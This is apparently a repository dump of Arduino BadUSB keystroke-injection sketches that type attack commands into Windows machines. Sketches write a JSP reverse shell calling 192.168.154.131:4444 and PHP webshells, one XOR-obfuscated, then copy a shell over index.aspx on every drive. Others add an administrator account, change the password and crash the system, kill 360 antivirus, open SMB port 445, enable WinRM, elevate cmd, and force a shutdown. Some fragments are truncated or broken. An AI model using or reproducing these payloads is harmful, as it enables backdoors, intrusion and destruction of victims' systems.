//目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入jsp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: 
Site_AWord_IntrusionCode/JspTrojanWrite(JSP_websiteServerUsing-non-Sentence).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println('echo ^<%@page import="java.lang.*"%^> >> hacked.jsp'); //向hacked.jsp写内容 delay(200); Keyboard.println('echo ^<%@page import="java.util.*"%^> >> hacked.jsp'); delay(200); Keyboard.println('echo ^<%@page import="java.io.*"%^> >> hacked.jsp'); delay(200); Keyboard.println('echo ^<%@page import="java.net.*"%^> >> hacked.jsp'); delay(200); Keyboard.println("echo ^<% >> hacked.jsp"); delay(200); Keyboard.println("echo class StreamConnector extends Thread >> hacked.jsp"); delay(200); Keyboard.println("echo { >> hacked.jsp"); delay(200); Keyboard.println("echo InputStream ep; >> hacked.jsp"); delay(200); Keyboard.println("echo OutputStream wk; >> hacked.jsp"); delay(200); Keyboard.println("echo StreamConnector( InputStream ep, OutputStream wk ) >> hacked.jsp"); delay(200); Keyboard.println("echo { >> hacked.jsp"); delay(200); Keyboard.println("echo this.ep = ep; >> hacked.jsp"); delay(200); Keyboard.println("echo this.wk = wk; >> hacked.jsp"); delay(200); Keyboard.println("echo } >> hacked.jsp"); delay(200); Keyboard.println("echo public void run() >> hacked.jsp"); delay(200); Keyboard.println("echo { >> hacked.jsp"); delay(200); Keyboard.println("echo BufferedReader lv = null; >> hacked.jsp"); delay(200); Keyboard.println("echo BufferedWriter gih = null; >> hacked.jsp"); delay(200); Keyboard.println("echo try >> hacked.jsp"); delay(200); Keyboard.println("echo { >> hacked.jsp"); delay(200); Keyboard.println("echo lv = new BufferedReader( new 
InputStreamReader( this.ep ) ); >> hacked.jsp"); delay(200); Keyboard.println("echo gih = new BufferedWriter( new OutputStreamWriter( this.wk ) ); >> hacked.jsp"); delay(200); Keyboard.println("echo char buffer[] = new char[8192]; >> hacked.jsp"); delay(200); Keyboard.println("echo int length; >> hacked.jsp"); delay(200); Keyboard.println("echo while( ( length = lv.read( buffer, 0, buffer.length ) ) > 0 ) >> hacked.jsp"); delay(200); Keyboard.println("echo { >> hacked.jsp"); delay(200); Keyboard.println("echo gih.write( buffer, 0, length ); >> hacked.jsp"); delay(200); Keyboard.println("echo gih.flush(); >> hacked.jsp"); delay(200); Keyboard.println("echo } >> hacked.jsp"); delay(200); Keyboard.println("echo } catch( Exception e ){} >> hacked.jsp"); delay(200); Keyboard.println("echo try >> hacked.jsp"); delay(200); Keyboard.println("echo { >> hacked.jsp"); delay(200); Keyboard.println("echo if( lv != null ) >> hacked.jsp"); delay(200); Keyboard.println("echo lv.close(); >> hacked.jsp"); delay(200); Keyboard.println("echo if( gih != null ) >> hacked.jsp"); delay(200); Keyboard.println("echo gih.close(); >> hacked.jsp"); delay(200); Keyboard.println("echo } catch( Exception e ){} >> hacked.jsp"); delay(200); Keyboard.println("echo } >> hacked.jsp"); delay(200); Keyboard.println("echo } >> hacked.jsp"); delay(200); Keyboard.println("echo try >> hacked.jsp"); delay(200); Keyboard.println("echo { >> hacked.jsp"); delay(200); Keyboard.println("echo String ShellPath; >> hacked.jsp"); delay(200); Keyboard.println('echo if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) { >> hacked.jsp'); delay(200); Keyboard.println('echo ShellPath = new String("/bin/sh"); >> hacked.jsp'); delay(200); Keyboard.println("echo } else { >> hacked.jsp"); delay(200); Keyboard.println('echo ShellPath = new String("cmd.exe"); >> hacked.jsp'); delay(200); Keyboard.println("echo } >> hacked.jsp"); delay(200); Keyboard.println('echo Socket socket = new Socket( 
"192.168.154.131", 4444 ); >> hacked.jsp'); //改为自己主机的IP地址和对应端口号 delay(200); Keyboard.println("echo Process process = Runtime.getRuntime().exec( ShellPath ); >> hacked.jsp"); delay(200); Keyboard.println("echo ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); >> hacked.jsp"); delay(200); Keyboard.println("echo ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); >> hacked.jsp"); delay(200); Keyboard.println("echo } catch( Exception e ) {} >> hacked.jsp"); delay(200); Keyboard.println("echo %^> >> hacked.jsp"); delay(200); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入jsp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); 
//按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("echo ^> hacked.php"); //向hacked.php写内容,类绕过,密码wwy delay(200); Keyboard.println("echo class shawaf >> hacked.php"); delay(200); Keyboard.println("echo { >> hacked.php"); delay(200); Keyboard.println("echo public $a = ''; >> hacked.php"); delay(200); Keyboard.println("echo function __destruct(){ >> hacked.php"); delay(200); Keyboard.println('echo assert("$this->a"); >> hacked.php'); delay(200); Keyboard.println("echo } >> hacked.php"); delay(200); Keyboard.println("echo } >> hacked.php"); delay(200); Keyboard.println("echo $b = new shawaf; >> hacked.php"); delay(200); Keyboard.println('echo $b->a = $_POST["wwy"]; >> hacked.php'); delay(200); Keyboard.println("echo ?^> >> hacked.php"); delay(200); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... 
>> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("echo ^> hacked.php"); //向hacked.php写内容,密码_ delay(200); Keyboard.println("echo $_=(''^'`').(''^'`').(''^'`'); >> hacked.php"); //ass delay(200); Keyboard.println("echo $__=(''^'`').(''^'`').(''^'`'); >> hacked.php"); //ert delay(200); Keyboard.println("echo $_ = $_.$__; >> hacked.php"); //assert delay(200); Keyboard.println("echo $__='_'.('\''^'`').('%'^'`').('4'^'`'); >> hacked.php"); //_GET delay(200); Keyboard.println("echo //$__='_'.(' >> hacked.php"); delay(200); Keyboard.println("echo 
//'^']').('/'^'`').(''^']').(' '^']'); >> hacked.php"); //_POST delay(200); Keyboard.println("echo $___=$$__; >> hacked.php"); delay(200); Keyboard.println("echo @$_($___[_]); >> hacked.php"); //@assert($_GET[_]) delay(200); Keyboard.println("echo ?^> >> hacked.php"); delay(200); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: Site_AWord_IntrusionCode/PHP_TrojanWrite(usedByPHP_websiteServer).ino ================================================ #include void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题 Keyboard.release(KEY_CAPS_LOCK); //释放大写键 delay(200); Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.println("cmd.exe"); delay(200); Keyboard.println("echo ^ >> hacked.php"); 
//向hacked.php写内容,密码wwy delay(200); Keyboard.println("echo @echo off >> hacked.bat"); delay(200); Keyboard.println("echo set 'FileName=index.aspx' >> hacked.bat"); //目标文件index.aspx delay(200); Keyboard.println("echo echo 正在更新磁盘文件,请稍候... >> hacked.bat"); delay(200); Keyboard.println("echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if exist %%a:\ ( >> hacked.bat"); delay(200); Keyboard.println("echo pushd %%a:\ >> hacked.bat"); delay(200); Keyboard.println("echo for /r %%b in (*%FileName%) do ( >> hacked.bat"); delay(200); Keyboard.println("echo if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat"); delay(200); Keyboard.println("echo copy %~p0hacked.aspx %%~dpb >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo popd >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("echo ) >> hacked.bat"); delay(200); Keyboard.println("hacked.bat"); //放入asp网站根目录,作为后门等待连接 delay(9000); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: SpecificFunctionCode/AddUserCode(Tools).ino ================================================ #include void setup() { // 这里执行一次 Keyboard.begin();//开始键盘通讯 delay(2000);//初始化时间 Keyboard.press(KEY_LEFT_GUI); //点击win键 delay(50); //延迟执行时间 Keyboard.press('r'); //点击r键 delay(50); Keyboard.release(KEY_LEFT_GUI); //释放win键 Keyboard.release('r'); //释放r键 delay(50); Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //打开cmd并将串口最小化 delay(100); Keyboard.press(KEY_RETURN); //回车 Keyboard.release(KEY_RETURN); //释放回车 delay(50); Keyboard.println("net user test 123456 /add&net localgroup Administrators test /add"); //添加test用户 delay(1000); Keyboard.press(KEY_RETURN); Keyboard.release(KEY_RETURN); delay(1000); Keyboard.println("exit"); delay(50); Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN);
  Keyboard.end();//end the keyboard HID session
}
void loop() {
  // runs repeatedly; nothing to do here
}
================================================ FILE: SpecificFunctionCode/Alt-f4_Loop.ino ================================================
// Denial-of-use sketch: sends Alt+F4 (close active window) forever. Neither key
// is ever released and the loop has no delay, so after the first report the host
// simply sees a permanently held Alt+F4 chord.
void setup() {//initialisation
  Keyboard.begin();
}
void loop()//repeats forever
{
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_F4);
}
================================================ FILE: SpecificFunctionCode/ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino ================================================
#include // header name lost in page extraction (angle brackets stripped); presumably <Keyboard.h> -- verify against the repository
// Destructive sketch. From a Win+R cmd it: clears the RunMRU history, changes the
// current user's password to HACKED (net user %USERNAME% HACKED), writes an ASCII
// banner to hacked.txt in the cmd's working directory and prints it, then tries to
// crash the machine by attaching ntsd to winlogon.exe (-c q) and killing
// wininit.exe, and finally kills explorer.exe. Artefacts: hacked.txt, the password
// change event, and ntsd/taskkill aimed at winlogon/wininit.
void setup() {//initialisation
  Keyboard.begin();//start the keyboard HID session
  delay(5000);//wait for device enumeration
  Keyboard.press(KEY_CAPS_LOCK); //toggle Caps Lock: the author notes that without this most machines running a Chinese IME mangle the typed text
  Keyboard.release(KEY_CAPS_LOCK); //release Caps Lock
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//Win key
  delay(200);
  Keyboard.press('r');//r key -> Win+R
  delay(200);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200);
  Keyboard.println("CMD.EXE /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&NET USER %USERNAME% HACKED");//clear RunMRU, then set the current user's password to HACKED (inverted-case text; Caps Lock was toggled above, presumably so it arrives normal-case)
  delay(200);
  Keyboard.println("color a");//console colour (green)
  delay(200);
  // Build an ASCII-art banner in hacked.txt, one echo per row, cycling the console colour between rows.
  Keyboard.println("echo ........................................................ >> hacked.txt");//append to hacked.txt
  delay(200);
  Keyboard.println("echo ## ## ### ###### ## ## ######## ######## >> hacked.txt");//append to hacked.txt
  delay(200);
  Keyboard.println("color 0");//console colour
  delay(200);
  Keyboard.println("echo ## ## ## ## ## ## ## ## ## ## ## >> hacked.txt");//append to hacked.txt
  delay(200);
  Keyboard.println("color 1");//console colour
  delay(200);
  Keyboard.println("echo ## ## ## ## ## ## ## ## ## ## >> hacked.txt");//append to hacked.txt
  delay(200);
  Keyboard.println("color 2");//console colour
  delay(200);
  Keyboard.println("echo ######### ## ## ## ##### ###### ## ## >> hacked.txt");//append to hacked.txt
  delay(200);
  Keyboard.println("color 3");//console colour
  delay(200);
  Keyboard.println("echo ## ## ######### ## ## ## ## ## ## >> hacked.txt");//append to hacked.txt
  delay(200);
  Keyboard.println("color 4");//console colour
  delay(200);
  Keyboard.println("echo ## ## ## ## ## ## ## ## ## ## ## >> hacked.txt");//append to hacked.txt
  delay(200);
  Keyboard.println("color 5");//console colour
  delay(200);
  Keyboard.println("echo ## ## ## ## ###### ## ## ######## ######## >> hacked.txt");//append to hacked.txt
  delay(200);
  Keyboard.println("color 6");//console colour
  delay(200);
  Keyboard.println("echo ........................................................ >> hacked.txt");//append to hacked.txt
  delay(200);
  Keyboard.println("color c");//console colour (red)
  delay(200);
  Keyboard.println("cls");//clear the console
  delay(200);
  Keyboard.println("type hacked.txt");//print hacked.txt in the console
  delay(200);
  Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL");//original comment: blue-screens XP / 7 -- ntsd attaches to winlogon.exe and immediately quits (terminating it), then wininit.exe is killed
  delay(200);
  Keyboard.println("taskkill /f /im explorer.exe");//kill the desktop shell
  delay(200);
  Keyboard.end();//end the keyboard HID session
}
void loop()//main loop: intentionally empty
{
}
================================================ FILE: SpecificFunctionCode/EnablePSL_RemoteConnection(Tools).ino ================================================
// Looks like an unfilled payload-generator template rather than a buildable
// sketch: INPUT0/INPUT1 in the #defines and the bare DEFS token at the end are
// placeholders, and wait_for_drivers(), minimise_windows(), cmd_admin() and
// reset_windows_desktop() are not defined anywhere in this file. Intended effect
// as written: from an elevated cmd, add a local Administrator account, enable
// PowerShell remoting (WinRM) and open the public-profile WinRM inbound rule to
// any remote address. The account creation and Enable-PSRemoting /
// Set-NetFirewallRule are all high-signal audit events.
#define BOARDTYPE
#ifdef TEENSY2
#include // header name lost in page extraction (angle brackets stripped)
#endif
# define PAYLOAD_USER_ADD "net user INPUT0 INPUT1 /add" // INPUT0 = user name, INPUT1 = password (generator placeholders)
# define PAYLOAD_GROUP_ADD "net localgroup Administrators INPUT0 /add" // put that user in the local Administrators group
void setup(){
  delay(3000);
  wait_for_drivers(2000); // not defined in this file
  minimise_windows(); // not defined in this file
  delay(500);
  while(!cmd_admin(3,500)) { // not defined in this file; presumably tries to open an elevated cmd and is retried until it reports success
    reset_windows_desktop(2000); // not defined in this file
  }
  add_user();
  // Enable WinRM and widen the built-in public-profile WinRM-HTTP inbound rule to any remote address.
  Keyboard.println("powershell.exe Enable-PSRemoting -SkipNetworkProfileCheck -Force;Set-NetFirewallRule –Name \"WINRM-HTTP-In-TCP-PUBLIC\" –RemoteAddress Any");
  delay(2000);
  Keyboard.println("exit");
}
void loop(){
}
// Types the two net commands defined above into whatever window has focus.
void add_user(){
  delay(2000);
  Keyboard.println(PAYLOAD_USER_ADD);
  delay(2000);
  Keyboard.println(PAYLOAD_GROUP_ADD);
  delay(1000);
}
DEFS // generator placeholder where the helper definitions would be inlined
================================================ FILE: SpecificFunctionCode/ForceShutDownCommand(Tool).ino ================================================
// Immediate forced shutdown: Win+R, then "shutdown -s -f -t 0" typed with Caps
// Lock toggled on (hence the upper-case string).
void setup() {//initialisation
  Keyboard.begin();//start the keyboard HID session
  delay(3000);//wait for device enumeration
  Keyboard.press(KEY_LEFT_GUI);//Win key
  delay(500);
  Keyboard.press('r');//r key -> Win+R
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);//toggle Caps Lock on
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("SHUTDOWN -S -F -T 0");//shut down, force-close applications, zero delay
  Keyboard.press(KEY_CAPS_LOCK);//toggle Caps Lock back off
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//end the keyboard HID session
}
void loop()//main loop: intentionally empty
{
}
================================================ FILE: SpecificFunctionCode/ForcedDeletionOf360Processes(Tools).ino ================================================
// Targets the 360 Safe endpoint product. Sequence: park the mouse in the top-left
// corner, run 360Tray.exe with /disablesp 1, kill explorer.exe, sweep the mouse
// down the screen clicking repeatedly (presumably to click through the product's
// confirmation dialogs), open Task Manager via Ctrl+Alt+Del, start a new
// "explorer" task, and finally kill taskmgr.exe, 360Tray.exe and ZhuDongFangYu.exe
// (主动防御, "active defence"). Uses both the Mouse and Keyboard HID interfaces.
void setup() {
  Mouse.begin();//start the mouse HID session
  Keyboard.begin();
  delay(7000);
  for(int i=0;i<20;i++){
    Mouse.move(-127,-127);//move mouse (x,y): 20 maximum-distance moves up-left park the pointer in the top-left corner
  }
  Keyboard.press(KEY_LEFT_GUI);//Win key
  delay(500);
  Keyboard.press('r');//r key -> Win+R
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500);
  // Ask 360Tray itself to disable its protection (/disablesp 1); 32-bit install path is hard-coded.
  Keyboard.println("\"C:\\Program Files (x86)\\360\\360Safe\\safemon\\360Tray.exe\" /disablesp 1");
  Keyboard.press(KEY_LEFT_GUI);//Win key
  delay(500);
  Keyboard.press('r');//r key
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(1000);
  Keyboard.println("taskkill /F /IM explorer.exe");
  delay(3000);
  // Raster-scan the screen with clicks: 30 columns 20 px apart, 100 clicks 8 px apart down each column, then back to the top edge.
  for(int b=0;b<30;b++){
    Mouse.move(20,0);
    for(int a=0;a<100;a++){
      Mouse.move(0,8);
      Mouse.click();
    }
    for(int c=0;c<20;c++){
      Mouse.move(0,-127);//move mouse (x,y): return to the top edge
    }
  }
  // Ctrl+Alt+Del; note Alt stays held for the key presses that follow.
  Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.press(KEY_DELETE);
  Keyboard.release(KEY_LEFT_CTRL);
  Keyboard.release(KEY_DELETE);
  delay(2000);
  Keyboard.press('t');//'t' on the security screen: presumably the Task Manager accelerator
  Keyboard.release('t');
  delay(1000);
  Keyboard.press('f');//Alt+F, N: presumably Task Manager's File > New task (Run...)
  Keyboard.press('n');
  Keyboard.release('f');
  Keyboard.release('n');
  Keyboard.release(KEY_LEFT_ALT);
  delay(1000);
  Keyboard.print("explorer");//restart the shell; the Tab + space that follow presumably tick a checkbox in the dialog before Enter -- verify on the target Windows version
  Keyboard.press(KEY_TAB);
  Keyboard.release(KEY_TAB);
  delay(500);
  Keyboard.println(" ");
  delay(3000);
  Keyboard.press(KEY_LEFT_GUI);//Win key
  delay(500);
  Keyboard.press('r');//r key
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(1000);
  // Kill Task Manager and the two 360 processes (tray and active defence).
  Keyboard.println("cmd /c taskkill /F /IM taskmgr.exe&taskkill /F /IM 360Tray.exe&taskkill /F /IM ZhuDongFangYu.exe");
  Mouse.end();//end the mouse HID session
  Keyboard.end();
}
void loop() {
  // put your main code here, to run repeatedly:
}
================================================ FILE: SpecificFunctionCode/Hide_CMD_Window(Display).ino ================================================
//hide the CMD window
// Opens a tiny cmd window (30 cols x 6 lines) via Win+R, then uses the window's
// system menu (Alt+Space, M = Move) and holds Left for 3 s so the window is
// dragged off the left edge of the screen; Enter commits the move. cmd switches:
// /t:01 colours, /q echo off, /d skip AutoRun, /f:off completion off, /v:on
// delayed expansion, /k keep the window running.
void setup() {
  Keyboard.begin();
  delay(3000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(200);
  Keyboard.print('r');//Win+R
  delay(200);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);//toggle Caps Lock on (command below is typed in mixed case)
  Keyboard.release(KEY_CAPS_LOCK);
  delay(1000);
  //=========================Run==========================
  Keyboard.println("CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6");
  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);//Alt+Space: window system menu
  delay(200);
  Keyboard.press(' ');
  delay(200);
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(' ');
  delay(200);
  Keyboard.print("m");//M = Move
  Keyboard.press(KEY_LEFT_ARROW);//hold Left for 3 s to push the window off-screen
  delay(3000);
  Keyboard.release(KEY_LEFT_ARROW);
  Keyboard.println();//Enter commits the move
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);//toggle Caps Lock back off
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}
void loop() {
}
================================================ FILE: SpecificFunctionCode/MouseKeepsMoving(Tools).ino ================================================
// Anti-idle jiggler: nudges the pointer 10 px right, then 10 px left, every 0.8 s,
// which keeps screen savers / lock timeouts from triggering.
void setup() {
  Mouse.begin();
}
void loop() {
  Mouse.move(10,0);
  delay(800);
  Mouse.move(-10,0);
  delay(800);
}
================================================ FILE: SpecificFunctionCode/OpenPort445.ino ================================================
// Digispark (ATtiny85) variant using the DigiKeyboard library instead of the
// Arduino Keyboard API. Minimises all windows (Win+M), opens Win+R, starts cmd and
// adds an inbound Windows Firewall allow rule named "open445" for TCP/445 (SMB).
// The literal rule name is a convenient detection artefact.
#include "DigiKeyboard.h"
// HID usage IDs for keys the library does not name; none of them is used in this sketch.
#define KEY_ESC 41
#define KEY_BACKSPACE 42
#define KEY_TAB 43
#define KEY_PRT_SCR 70
#define KEY_DELETE 76
void setup() {
  DigiKeyboard.delay(5000);//wait for enumeration
  DigiKeyboard.sendKeyStroke(0);//empty report; commonly used with DigiKeyboard to make sure the host is ready before real input
  DigiKeyboard.delay(5000);
  DigiKeyboard.sendKeyStroke(KEY_M,MOD_GUI_LEFT);//Win+M: minimise all windows (KEY_*/MOD_* presumably from DigiKeyboard.h)
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);//Win+R
  DigiKeyboard.delay(500);
  DigiKeyboard.print(F("cmd"));
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  // Types: netsh advfirewall firewall add rule name="open445" dir=in protocol=tcp localport=445 action=allow
  // char(34) is the double-quote character.
  DigiKeyboard.print(F("netsh advfirewall firewall add rule name="));
  DigiKeyboard.print(char(34));
  DigiKeyboard.print(F("open445"));
  DigiKeyboard.print(char(34));
  DigiKeyboard.print(F(" dir=in protocol=tcp localport=445 action=allow"));
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {
}
================================================ FILE: SpecificFunctionCode/OpenSpecified_webPage.ino ================================================ void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(3000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(200); Keyboard.press('r');//r键 delay(200); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(200); Keyboard.println("HTTP://SHOP117137052.TAOBAO.COM"); Keyboard.println(); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { } ================================================ FILE: SpecificFunctionCode/ShiftBackdoor.ino ================================================ //Lemon_C Device Library //shop117137052.taobao.com void setup() {//初始化 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6"); //尽量隐藏命令行窗口 delay(1000); Keyboard.press(KEY_LEFT_ALT); delay(200); Keyboard.print(" "); delay(200); Keyboard.release(KEY_LEFT_ALT); delay(200); Keyboard.print("m"); Keyboard.press(KEY_LEFT_ARROW); delay(3000); Keyboard.release(KEY_LEFT_ARROW); delay(500); Keyboard.println(); delay(500); Keyboard.println("POWERSHELL.EXE -C START-PROCESS CMD -VERB RUNAS&&EXIT"); //psl启动dos命令 //NEED BYPASS UAC NOW,SET DELAY=3S. 
